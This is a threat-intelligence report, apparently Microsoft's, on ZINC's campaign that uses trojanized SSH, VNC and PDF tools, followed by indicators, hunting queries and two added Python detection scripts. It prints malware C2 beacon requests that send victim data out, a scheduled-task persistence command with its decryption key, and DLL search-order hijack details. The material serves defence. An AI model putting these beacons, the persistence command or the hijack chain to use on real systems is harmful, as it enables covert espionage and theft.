Microsoft has recently discovered a wide range of social engineering campaigns by an actor we track as ZINC that use weaponized, legitimate open-source software. The Microsoft Threat Intelligence Center (MSTIC) has observed activity targeting employees of organizations in multiple industries, including media, defense and aerospace, and IT services, in the US, UK, India, and Russia. Based on the observed tradecraft, infrastructure, tooling, and account affiliations, MSTIC attributes this campaign with high confidence to ZINC, a state-sponsored group based in North Korea whose objectives are espionage, data theft, financial gain, and network disruption.
Beginning in June 2022, ZINC employed traditional social engineering tactics, initially connecting with individuals on LinkedIn to establish trust with their targets. Once a connection was made, ZINC encouraged continued communication on WhatsApp, which served as the means of delivering the malicious payloads.
MSTIC observed ZINC weaponizing a range of open-source software, including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and the muPDF/Subliminal Recording installer, for these attacks. ZINC was observed attempting to move laterally and exfiltrate collected data from victim networks, and has successfully compromised numerous organizations since June 2022. Mandiant also reported on the ongoing campaign using weaponized PuTTY last month. Because the platforms and software used in this campaign are so widely adopted, ZINC may pose a significant threat to individuals and organizations across multiple sectors and regions.
Microsoft Defender for Endpoint provides comprehensive protection against the tools and custom malware used by ZINC, including ZetaNile. The hunting queries provided at the end of this article enable customers to search their environments for relevant indicators. As with any observed nation-state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts.
Who is ZINC?
ZINC is a highly operational, destructive, and sophisticated nation-state activity group. Active since 2009, the group gained public notoriety in 2014 after its successful attack against Sony Pictures Entertainment. Microsoft has identified FoggyBrass and PhantomStar as two of the custom remote access tools (RATs) in ZINC's toolset.
Microsoft researchers have observed ZINC primarily using spear-phishing, but the group also uses social engineering on social networking platforms and targeted website compromises to achieve its objectives. ZINC targets employees of the companies it seeks to infiltrate and attempts to coerce them into opening weaponized documents containing malicious macros or installing seemingly benign applications. Security researchers have also been the targets of targeted attacks over Twitter and LinkedIn.
ZINC attacks appear to be motivated by traditional cyberespionage, theft of personal and corporate data, financial gain, and corporate network destruction. ZINC attacks bear many hallmarks of state-sponsored activity, such as heightened operational security, sophisticated malware that evolves over time, and politically motivated targeting.
From late April through mid-September 2022, ZINC, also known as Labyrinth Chollima and Black Artemis, was seen carrying out this campaign.
Figure 1. Attack flow diagram for the recent ZINC campaign
Observed actor activity
Impersonation and establishing contact
LinkedIn Threat Prevention and Defense detected ZINC creating fake profiles claiming to be recruiters at technology, defense, and media entertainment companies, with the goal of moving targets away from LinkedIn to the encrypted messaging app WhatsApp for malware delivery. ZINC primarily targeted engineers and technical support professionals working at media and IT companies located in the US, UK, and India. Targets received outreach tailored to their profession or background and were encouraged to apply for an open position at one of several legitimate companies. In accordance with its policies, LinkedIn promptly terminated accounts associated with inauthentic or fraudulent behavior for the accounts identified in these attacks.
Figure 2. Fraudulent recruiter profile
Multiple methods used for delivery of ZetaNile
MSTIC has identified at least five methods by which trojanized open-source applications deliver the malicious payloads and shellcode tracked as the ZetaNile malware family. The ZetaNile implants, also known as BLINDINGCAN, have been covered in reports from CISA and JPCERT. The ZetaNile implant DLLs are either packed with commercial software protectors such as Themida and VMProtect or encrypted with custom algorithms.
As shown in Figure 3, the payload of the malicious DLL is decrypted with a custom key that is passed in as a command-line argument to the legitimate Windows process whose DLL search order is hijacked to load it. The ZetaNile implants send command-and-control (C2) HTTP requests to known compromised C2 domains using either custom encryption routines or AES. By encoding the victim information in parameters with common names such as gametype or bbs in the HTTP POSTs, these C2 communications can blend in with legitimate traffic.
The weaponization of SSH clients
After establishing contact with a target, ZINC deployed weaponized versions of the SSH clients PuTTY and KiTTY, which served as the entry point for the ZetaNile implant. Both applications provide terminal emulator support for a range of networking protocols, making them attractive to the users ZINC typically targets. The weaponized versions were typically delivered as ISO images or ZIP archives. Inside the archive, the recipient finds a ReadMe.txt file and an executable. As part of the progression of ZINC's malware development and in an attempt to evade traditional defenses, simply running the included executable does not drop the ZetaNile implant; deployment requires the SSH client to connect to the IP address provided in the ReadMe.txt file. Below is an example of what that file may contain:
Server: 137[.]184[.]15[.]189
User: [redacted]
Pass: [redacted]
Weaponized PuTTY malware
ZINC has used weaponized PuTTY as part of its attack chain for many years; the most recent iteration establishes persistence on compromised devices through scheduled tasks, activity that Mandiant recently reported on. The malicious PuTTY.exe is configured to install the EventHorizon malware at C:\ProgramData\colorui.dll and then copy C:\Windows\System32\colorcpl.exe to C:\ProgramData\colorcpl.exe. Through DLL search order hijacking, ZINC loads the second-stage malware colorui.dll and decrypts the payload with the key "0CE1241A44557AA438F27BC6D4ACA246" for use in command and control. Once connected to the C2 server, the attackers can use the compromised device to install additional malware for other purposes.
As part of the weaponized PuTTY configuration, a daily scheduled task named PackageColor is created to establish persistence. ZINC achieves this with the schtasks command shown in Figure 3 and listed in full in the indicators of compromise table below:
Figure 3. PuTTY – scheduled task as part of persistence
Weaponized KiTTY malware
ZINC has long used a weaponized version of PuTTY but only recently expanded its toolkit to include a weaponized version of KiTTY, a fork of PuTTY. The malicious application collects the target system's username and hostname and sends them over TCP/22 to a hardcoded IP address, 172[.]93[.]201[.]253. After establishing a successful TCP connection to the server at 137[.]184[.]15[.]189, the malicious KiTTY application performs several rounds of decoding and then drops the malware as %AppData%\KiTTY\mscoree.dll. The mscoree.dll file is the embedded ZetaNile payload, identified as EventHorizon. As with the weaponized PuTTY, the actor uses DLL search order hijacking to load the malicious DLL in the context of a legitimate Windows process, in this case via %AppData%\KiTTY\PresentationHost.exe -EmbeddingObject.
Figure 4. KiTTY – DLL search order hijacking
The mscoree.dll malware is modularized: after a successful connection to the compromised C2 domain, the attackers can use the established C2 channel to push additional malware to the target system as needed. For example, the attackers could run C:\ProgramData\Cisco\fixmapi.exe -s AudioEndpointBuilder to load a malicious mapistub.dll retrieved from the C2 server. The HTTP POST requests carry a unique ID in the gametype field and a hardcoded value in the type field, which are used to track activity across the malware campaign, as in the following request:
POST /wp-includes/php-compat/compat.php HTTP/1.1
Accept: text/*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/100.0.1185.39
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Host: olidhealth[.]com
Connection: Keep-Alive
Cache-Control: no-cache

gametype=[UniqueId]&type=O8Akm8aV09Nw412KoWJds
Weaponized TightVNC Viewer
Beginning in September 2022, ZINC was observed using a trojanized TightVNC Viewer that was delivered to a target alongside a weaponized SSH tool over WhatsApp. The PDB path embedded in this sample is distinctive; it is listed in the indicators of compromise table below.
The weaponized TightVNC Viewer was typically distributed over services such as WhatsApp as a compressed ZIP archive or a job description-themed ISO file. Inside the archive, the recipient finds a ReadMe.txt file and an executable. The text file contains the following:
Platform: 2nd from the list
User: [redacted]
Pass: [redacted]
As part of the actor's latest technique for evading traditional defenses, the malicious TightVNC Viewer ships with a pre-populated list of remote hosts and is configured to install the backdoor only when the user selects ec2-aet-tech.w-ada[.]amazonaws from the drop-down menu, as shown in Figure 5:
Figure 5. Weaponized TightVNC Viewer – user interface
As part of the victim's check-in with the C2, the malware was configured to send the victim's username and hostname to IP 44[.]238[.]74[.]84 and to establish VNC sessions to the same IP over TCP/5900. Once a connection to that server is established, the second-stage DLL payload embedded in TightVNC.exe is loaded in memory to begin C2 communication with a known compromised domain.
The weaponization of Sumatra PDF reader and muPDF/Subliminal Recording installer
ZINC has weaponized two PDF readers, Sumatra PDF and the muPDF/Subliminal Recording installer, which serve as the entry point for the ZetaNile implant. This delivery method is commonly used with fake job offers sent to targets seeking employment in the IT and defense sectors. The weaponized versions were typically delivered as compressed ZIP archives containing a single executable. Unlike the malicious Sumatra PDF reader, which is a fully functional PDF reader that loads the implant from a fake PDF file, the muPDF/Subliminal Recording installer installs the backdoor without any malicious PDF being opened.
Trojanized Sumatra PDF Reader
ZINC has used SecurePDF.exe, a trojanized version of Sumatra PDF Reader, since at least 2019, and it remains distinctive ZINC tradecraft. SecurePDF.exe is a modularized loader that installs the ZetaNile implant by loading a weaponized, job application-themed PDF file. That fake PDF is not a regular document: it carries the header "SPV005", a decryption key, an encrypted second-stage implant payload, and an encrypted decoy PDF, which the trojanized reader processes when the file is opened.
Once the second-stage malware is loaded in memory, the victim's hostname and device information are sent to the C2 server using custom encoding as part of the check-in. Over the C2 connection, the attackers can then push additional malware to the compromised device as needed.
Figure 6. SecurePDF interface
Trojanized muPDF/Subliminal Recording installer
In the malicious version of the muPDF/Subliminal Recording installer, setup.exe is configured to check for the file path ISSetupPrerequisites\Setup64.exe and to write C:\colrctl\colorui.dll to disk after extracting the executable embedded inside setup.exe. It then copies ColorCpl.exe from C:\Windows\System32 to the ColorCtrl directory. The malicious installer starts a new process, C:\colorctrl\colorcpl.exe, with the argument C3A9B30B6A313F289297C9A36730DB6D, which is passed to colorui.dll as the decryption key for the second stage of the infection. For the victim check-in, colorui.dll, which Microsoft tracks as part of the EventHorizon malware family, is injected into credwiz.exe or iexpress.exe to perform C2 HTTP requests and retrieve additional malware:
POST /support/support.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;
Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729;
InfoPath.3; .NET4.0C; .NET4.0E)
bbs=[encrypted payload]= &article=[encrypted payload]
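The three check-ins described on this page (the KiTTY request above, the muPDF/Subliminal Recording request just shown, and the SecurePDF beacon) share one shape: a POST to a compromised site whose form fields carry an ID or ciphertext under an ordinary-looking name. The Python script below is an added example for this article, not Microsoft's tooling and not part of the original report. It parses a raw HTTP request, matches the Host and User-Agent against the indicators listed later on this page, recognises the gametype/type and bbs/article beacon shape, and only returns a verdict of "c2" when the host is known or a hardcoded user agent coincides with that shape, because the parameter names were chosen precisely to look ordinary. Both user-agent strings for the MSIE 7.0 implant are included, since the IOC table lists a "WOW64" variant while the request above carries "Win64; x64"; exact-string UA matching is brittle for that reason. The sample requests are constructed (the ID and ciphertext values are made up, and the host for the muPDF check-in is a placeholder because the page does not name it).

```python
from urllib.parse import parse_qsl

# Indicators from the IOC table on this page; hosts stay defanged so this script
# can never be pointed at them.
C2_HOSTS = {"olidhealth[.]com"}
C2_USER_AGENTS = {
    # hardcoded KiTTY.exe user agent
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/102.0.5005.63 Safari/537.36 Edg/100.0.1185.39",
    # hardcoded SecurePDF.exe user agent, as listed in the IOC table
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; "
    ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)",
    # the variant carried by the muPDF/Subliminal Recording check-in shown above
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; "
    ".NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)",
}
# Form-parameter sets the implants use so a beacon looks like game or forum traffic.
C2_PARAM_SETS = [{"gametype", "type"}, {"bbs", "article"}]
# Beacon values are IDs or ciphertext: long runs of base64/hex-safe characters.
TOKEN_CHARS = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")


def defang(host: str) -> str:
    """Normalise a Host value to the defanged form used in C2_HOSTS."""
    return host.replace("[.]", ".").replace(".", "[.]")


def looks_like_token(value: str, min_len: int = 16) -> bool:
    return len(value) >= min_len and set(value) <= TOKEN_CHARS


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": parts[0], "path": parts[1] if len(parts) > 1 else "",
            "headers": headers, "body": body}


def triage_request(raw: str) -> dict:
    """Return a verdict ('c2', 'suspicious' or 'clean') and the findings behind it."""
    req = parse_http_request(raw)
    hdr, findings = req["headers"], []

    host = defang(hdr.get("host", ""))
    host_hit = host in C2_HOSTS
    if host_hit:
        findings.append(f"Host {host} is a known ZetaNile C2 domain")

    ua_hit = hdr.get("user-agent", "") in C2_USER_AGENTS
    if ua_hit:
        findings.append("User-Agent matches a hardcoded ZetaNile implant string")

    params = dict(parse_qsl(req["body"], keep_blank_values=True))
    beacon_shape = (req["method"] == "POST" and set(params) in C2_PARAM_SETS
                    and all(looks_like_token(v) for v in params.values()))
    if beacon_shape:
        findings.append(f"POST body uses the {sorted(params)} parameter set with opaque values")

    # The parameter names are deliberately ordinary, so alone they are only a lead. A known
    # host, or a hardcoded UA together with the beacon shape, is treated as a detection.
    if host_hit or (ua_hit and beacon_shape):
        verdict = "c2"
    elif ua_hit or beacon_shape:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "findings": findings}


# Constructed samples, not real captures: check-ins modelled on the two requests shown on
# this page (ID and ciphertext values are made up; the muPDF host is a placeholder) and a
# benign forum post that happens to use the same parameter names.
KITTY_SAMPLE = (
    "POST /wp-includes/php-compat/compat.php HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/102.0.5005.63 Safari/537.36 Edg/100.0.1185.39\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: olidhealth[.]com\r\n\r\n"
    "gametype=5f3a9c1e7b2d4a6e8c0f1b3d5e7a9c2b&type=O8Akm8aV09Nw412KoWJds"
)
MUPDF_SAMPLE = (
    "POST /support/support.asp HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; "
    ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)\r\n"
    "Host: cdn-updates.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "bbs=QmFzZTY0IGNpcGhlcnRleHQgZ29lcyBoZXJl=&article=c2Vjb25kIGJsb2Igb2YgY2lwaGVydGV4dA=="
)
BENIGN_SAMPLE = (
    "POST /board/post.php HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/117.0.0.0 Safari/537.36\r\n"
    "Host: forum.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "bbs=general&article=12345"
)
```

Feed it raw requests reassembled from a packet capture or proxy log: `triage_request(KITTY_SAMPLE)` returns "c2" with three findings, the muPDF-style sample returns "c2" on the user agent plus beacon shape even though its host is unknown, and the benign forum post returns "clean" because its bbs/article values are short readable words rather than opaque tokens.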
Microsoft continues to monitor ZINC activity and to implement protections for our customers. The detections and IOCs currently in place across our security products are listed below.
Recommended customer actions
The following mitigations reduce the impact of the techniques used by the actor and described in the "Observed actor activity" section:
- Use the indicators of compromise provided to investigate whether they exist in your environment and assess for potential intrusion.
- Block inbound traffic from the IP addresses listed in the "Indicators of compromise" table.
- Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single-factor authentication, to confirm authenticity and investigate any anomalous activity.
- Enable multifactor authentication (MFA) and ensure it is enforced for all remote connectivity to reduce the risk of credential compromise. NOTE: Microsoft strongly encourages all customers to download and use passwordless solutions such as Microsoft Authenticator to secure accounts.
- Educate end users about preventing malware infections, including ignoring or deleting unsolicited and unexpected emails with ISO attachments. Encourage good credential hygiene, limit the use of accounts with local or domain administrator privileges, and turn on Microsoft Defender Firewall to prevent infection and limit propagation.
- Educate end users about protecting personal and business information on social media, filtering unsolicited communication, identifying spear-phishing emails and watering holes, and reporting reconnaissance attempts and other suspicious activity.
Indicators of compromise (IOCs)
The list of IOCs below was identified during our investigation. We encourage customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.
| Indicator | Type | Description |
| --- | --- | --- |
| C:\ProgramData\Comms\colorui.dll | File path | Malicious PuTTY implant |
| %APPDATA%\KiTTY\mscoree.dll | File path | Malicious KiTTY implant |
| 172.93.201[.]253 | IP address | Adversary C2 server |
| 137.184.15[.]189 | IP address | Adversary SSH server |
| 44.238.74[.]84 | IP address | Hard-coded VNC server IP for malicious TightVNC |
| c:\windows\system32\schtasks.exe /CREATE /SC DAILY /MO 1 /ST 10:30 /TR "C:\Windows\System32\cmd.exe /c start /b C:\ProgramData\PackageColor\colorcpl.exe 0CE1241A44557AA438F27BC6D4ACA246" /TN PackageColor /F | Scheduled task command line | PuTTY.exe scheduled task (PackageColor) |
| e1ecf0f7bd90553baaa83dcdc177e1d2b20d6ee5520f5d9b44cdf59389432b10 | SHA-256 | Malicious KiTTY implant (mscoree.dll) |
| c5a470cdf6f57125a8671f6b8843149cc78ccbc1a7bc615f34b23d9f241312bf | SHA-256 | Weaponized Sumatra PDF Reader executable |
| 71beb4252e93291c7b14dfcb4cbb5d58144a76181fbe4aab3592121a3dbd9c55 | SHA-256 | Weaponized muPDF/Subliminal Recording installer |
| Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/100.0.1185.39 | User agent | Hardcoded KiTTY.exe user agent |
| Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E) | User agent | Hardcoded SecurePDF.exe user agent |
| N:\2.MyDevelopment\3.Tools_Development\4.TightVNCCustomize\Munna_Customize\tightvnc\x64\\Release\tvnviewer.pdb | PDB path | PDB path for malicious TightVNC |
NOTE: These indicators should not be considered exhaustive for this observed activity.
Microsoft Defender Antivirus
Microsoft Defender Antivirus and Microsoft Defender for Endpoint customers should watch for activity associated with these attacks under the following malware family names:
Microsoft Defender for Endpoint
The activities linked to this threat may be indicated by the following Microsoft Defender for Endpoint alerts. However, these alerts might also be set off by unrelated threat activities.
- Suspicious Task Scheduler activity
- Suspicious connection to remote service
- A suspicious file was observed
- An executable loaded an unexpected dll
- Possible theft of remote session credentials
Microsoft 365 Defender
Customers of Microsoft 365 Defender can use the following advanced hunting queries to find connected activity:
- Suspicious mapistub.dll file creation
Look for PresentationHost.exe creating mapistub.dll, which is likely to be used in a DLL search order hijack.
DeviceFileEvents
| where InitiatingProcessFileName =~ "presentationhost.exe"
| where FileName =~ "mapistub.dll"
- Suspicious mscoree.dll file creation
Find instances of mscoree.dll being created by KiTTY or PuTTY processes.
DeviceFileEvents
| where InitiatingProcessFileName hassuffix "kitty.exe" or InitiatingProcessVersionInfoInternalFileName has "PuTTY"
| where FileName =~ "mscoree.dll"
- Suspicious colorcpl.exe image load
Surface DLL search order hijacking where the colorcpl.exe process loads colorui.dll from a path other than the expected one.
DeviceImageLoadEvents
| where InitiatingProcessFileName =~ "colorcpl.exe"
| where FileName =~ "colorui.dll" and not(FolderPath has_any("system32", "syswow64", "program files"))
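As an added example (not part of Microsoft's report and not its detection logic), the script below reimplements the three hunting queries above in Python over constructed endpoint telemetry and adds the scheduled-task check the weaponized PuTTY section calls for. It parses a schtasks /CREATE command line and flags any task action that runs a binary from outside System32, SysWOW64 or Program Files or that passes a 32-hex-character argument, the decryption-key pattern of the PackageColor task in the IOC table; it flags colorui.dll, mscoree.dll or mapistub.dll loaded from an untrusted path; and it flags those DLL names being written by the trojanized clients. The event records, the VendorUpdate task, and the TRUSTED_DIRS and DROPPERS lists are my assumptions for the example, not values from the page, so tune them to your estate before using this against real telemetry.

```python
import re

# Directories the legitimate copies of these binaries and DLLs load from (assumption for the
# example). One of the names below running or loading from anywhere else is worth a look.
TRUSTED_DIRS = ("\\windows\\system32\\", "\\windows\\syswow64\\",
                "\\program files\\", "\\program files (x86)\\")
# DLL names this page reports being planted for search order hijacking.
HIJACKED_DLLS = {"colorui.dll", "mscoree.dll", "mapistub.dll"}
# Processes this page reports writing those DLLs (hypothetical list for the example).
DROPPERS = {"kitty.exe", "putty.exe", "presentationhost.exe", "setup.exe"}


def in_trusted_dir(path: str) -> bool:
    return any(d in path.lower() for d in TRUSTED_DIRS)


def parse_schtasks_create(cmdline: str):
    """Return the /TN, /TR and /SC values of a 'schtasks /CREATE' command line, else None."""
    tokens = re.findall(r'"[^"]*"|\S+', cmdline)  # keep the quoted /TR action as one token
    lowered = [t.lower() for t in tokens]
    if not tokens or "schtasks" not in lowered[0] or "/create" not in lowered:
        return None
    args = {}
    for i, tok in enumerate(lowered):
        if tok in ("/tn", "/tr", "/sc") and i + 1 < len(tokens):
            args[tok] = tokens[i + 1].strip('"')
    return args


def check_scheduled_task(cmdline: str) -> list:
    task = parse_schtasks_create(cmdline)
    if task is None:
        return []
    name, action = task.get("/tn", "?"), task.get("/tr", "")
    hits = []
    # every .exe referenced by the action, e.g. cmd.exe and the binary it starts
    for exe in re.findall(r'[a-z]:\\[^"]*?\.exe', action, re.I):
        if not in_trusted_dir(exe):
            hits.append(("task-untrusted-binary", f"{name}: runs {exe}"))
    # a 32-hex-character argument is the decryption-key pattern used by this campaign
    if re.search(r"\b[0-9a-f]{32}\b", action, re.I):
        hits.append(("task-key-argument", f"{name}: passes a 32-hex-character argument"))
    return hits


def check_image_load(process: str, dll_path: str) -> list:
    dll = dll_path.rsplit("\\", 1)[-1].lower()
    if dll in HIJACKED_DLLS and not in_trusted_dir(dll_path):
        return [("dll-search-order-hijack", f"{process} loaded {dll} from {dll_path}")]
    return []


def check_file_create(process: str, file_path: str) -> list:
    dll = file_path.rsplit("\\", 1)[-1].lower()
    if dll in HIJACKED_DLLS and process.lower() in DROPPERS:
        return [("hijack-dll-dropped", f"{process} wrote {file_path}")]
    return []


def hunt(events: list) -> list:
    """Run every check over a list of event dicts and return the (rule, detail) hits."""
    hits = []
    for ev in events:
        if ev["type"] == "process":
            hits.extend(check_scheduled_task(ev["cmdline"]))
        elif ev["type"] == "imageload":
            hits.extend(check_image_load(ev["process"], ev["path"]))
        elif ev["type"] == "filecreate":
            hits.extend(check_file_create(ev["process"], ev["path"]))
    return hits


# Constructed sample telemetry (not real logs): the PackageColor task from the IOC table, a
# benign vendor task, and image-load/file-create events shaped like the hunting queries above.
SAMPLE_EVENTS = [
    {"type": "process", "cmdline": r'c:\windows\system32\schtasks.exe /CREATE /SC DAILY /MO 1 /ST 10:30 '
     r'/TR "C:\Windows\System32\cmd.exe /c start /b C:\ProgramData\PackageColor\colorcpl.exe '
     r'0CE1241A44557AA438F27BC6D4ACA246" /TN PackageColor /F'},
    {"type": "process", "cmdline": r'schtasks.exe /CREATE /SC DAILY /TR "C:\Program Files\Vendor\updater.exe /quiet" '
     r'/TN VendorUpdate /F'},
    {"type": "imageload", "process": "colorcpl.exe", "path": r"C:\ProgramData\Comms\colorui.dll"},
    {"type": "imageload", "process": "colorcpl.exe", "path": r"C:\Windows\System32\colorui.dll"},
    {"type": "filecreate", "process": "kitty.exe", "path": r"C:\Users\alice\AppData\Roaming\KiTTY\mscoree.dll"},
    {"type": "filecreate", "process": "msiexec.exe", "path": r"C:\Windows\System32\mscoree.dll"},
]
```

Running `hunt(SAMPLE_EVENTS)` yields four hits: the PackageColor task triggers both the untrusted-binary rule (colorcpl.exe under ProgramData) and the key-argument rule, the colorui.dll load from C:\ProgramData\Comms triggers the hijack rule, and kitty.exe writing mscoree.dll under AppData triggers the dropper rule; the vendor task and the two System32 events produce nothing. The path-based allow-list is the same idea as the `not(FolderPath has_any(...))` clause in the last KQL query, so keep the two in step.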